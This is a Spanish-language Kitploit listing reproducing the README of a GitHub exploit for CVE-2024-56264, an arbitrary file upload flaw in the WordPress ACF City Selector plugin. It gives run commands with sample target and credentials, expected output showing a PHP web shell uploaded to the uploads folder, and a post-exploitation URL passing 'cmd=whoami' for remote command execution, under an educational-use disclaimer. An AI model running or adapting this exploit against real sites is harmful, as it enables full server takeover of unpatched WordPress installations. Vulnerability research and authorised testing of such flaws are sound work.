Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-56264 — WordPress ACF City Selector plugin <= 1.14.0 - Vulnerabilidad de subida arbitraria de archivos | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-56264
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-56264

CVE-2024-56264

WordPress ACF City Selector plugin <= 1.14.0 - Vulnerabilidad de subida arbitraria de archivos

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-56264

WordPress ACF City Selector - Exploit de Subida Arbitraria de Archivos (CVE-2024-56264)

Resumen

Este repositorio contiene un exploit para CVE-2024-56264, que es una vulnerabilidad de Subida Arbitraria de Archivos encontrada en el plugin ACF City Selector de WordPress (versiones <= 1.14.0). Esta vulnerabilidad permite a un atacante subir un archivo PHP malicioso (web shell) a una instancia vulnerable de WordPress y ejecutar comandos arbitrarios en el servidor.

Detalles del CVE

  • ID del CVE: CVE-2024-56264
  • Fecha de publicación: 2 de enero de 2025
  • Plugin afectado: ACF City Selector
  • Versiones vulnerables: <= 1.14.0
  • Impacto: Ejecución remota de código (RCE) mediante subida de archivos sin restricciones

Descripción

El plugin ACF City Selector no valida correctamente los archivos subidos, lo que permite a los atacantes y subir . Una vez que se sube un archivo PHP malicioso, un atacante puede ejecutar comandos del sistema de forma remota, lo que conduce al .

omitir restricciones
archivos PHP arbitrarios
compromiso total del servidor

Requisitos

📌 Dependencias

Asegúrate de tener instalado lo siguiente antes de ejecutar el script:

  • Python 3.x
  • Módulo requests (Instálalo usando: pip install requests)

Puedes instalar todas las dependencias necesarias usando:

root@kitploit:~
pip install -r requirements.txt

🚀 Uso

Ejecutando el exploit:

root@kitploit:~
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD

WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability

options:
  -h, --help           show this help message and exit
  --url URL            Website base URL (e.g., http://192.168.100.74/wordpress)
  --username USERNAME  WordPress username
  --password PASSWORD  WordPress password

Ejemplo:

root@kitploit:~
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin

Salida Esperada

Tras una explotación exitosa, deberías ver:

root@kitploit:~
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php

Post-Explotación

Si tiene éxito, accede al shell subido mediante:

root@kitploit:~
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami

Esto permite la ejecución remota de comandos en el servidor.

⚠ Aviso Legal

Este script está destinado solo para fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado es ilegal y puede acarrear graves consecuencias. El autor no es responsable del mal uso de este exploit.

Descargar herramienta